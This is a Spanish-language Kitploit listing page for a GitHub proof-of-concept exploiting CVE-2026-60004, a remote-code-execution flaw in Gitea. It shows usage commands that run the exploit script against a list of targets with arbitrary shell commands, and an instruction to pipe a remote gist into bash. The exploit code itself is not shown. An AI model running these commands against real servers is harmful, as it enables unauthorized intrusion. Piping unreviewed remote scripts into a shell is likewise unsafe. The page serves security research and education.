Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-60004 — CVE-2026-60004 | Kitploit
Herramientas/GitHubGitHub/horkimhab/cve-2026-60004
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubhorkimhab/cve-2026-60004

CVE-2026-60004

CVE-2026-60004

Ver Repositorio
4hace 22 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2026-60004

Más: https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m

Donar

Apoya el mantenimiento de este proyecto con PayPal o escaneando el código QR a continuación.

paypal

Código QR para donación

⚡ Uso simple

Usa este proyecto solo en entornos seguros y autorizados, como:

  • Máquinas virtuales locales
  • Contenedores Docker
  • Entornos de laboratorio aislados
  • Entornos de prueba de penetración autorizados

Configuración de ejemplo:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Ejemplo de uso:

root@kitploit:~
# 1. Optional global password for lines that omit it
export GITEA_PASSWORD='defaultpass'

# 2. Run (safe first)
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run

# 3. Real run with 3 workers
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3

# 4. Classic single-target still works
python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id'

Nota:

  • al clonar desde otro proyecto, debes ejecutar curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y para limpiar el directorio .git anidado
  • p. ej.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédito o Referencia

  • https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m

📚 Repositorio Educativo de Investigación en Seguridad

Un repositorio para aprender, probar e investigar conceptos de ciberseguridad en entornos controlados.


⚠️ Aviso Legal y de Seguridad

Propósito

Este repositorio es solo para investigación de seguridad educativa y autorizada.

Está diseñado para ayudar a los usuarios a aprender sobre:

  • Vulnerabilidades de seguridad
  • Conceptos de sandbox y aislamiento
  • Prácticas de codificación segura y defensiva

Solo Uso Autorizado

Usa este repositorio solo en entornos donde tengas permiso, como:

  • Laboratorios personales o máquinas virtuales
  • Entornos Docker o aislados
  • Pruebas de penetración autorizadas
  • Formación en ciberseguridad o investigación académica

El uso no autorizado o ilegal está estrictamente prohibido.


Sin Responsabilidad

El autor y los colaboradores no son responsables de ningún daño, uso indebido, problema legal o pérdida causada por este proyecto.

Al usar este repositorio, aceptas que:

  • Eres responsable de tus propias acciones
  • Lo usarás de forma legal y ética
  • El proyecto se proporciona sin garantía

Uso Ético

Este proyecto está pensado para:

  • Investigación de seguridad defensiva
  • Educación en ciberseguridad
  • Conciencia sobre vulnerabilidades
  • Investigación de sistemas y software seguros

Por favor, sigue prácticas de divulgación responsable y cumple con todas las leyes aplicables.


Contacto

Para divulgación responsable o colaboración, contacta al mantenedor del repositorio a través de GitHub.

Descargar herramienta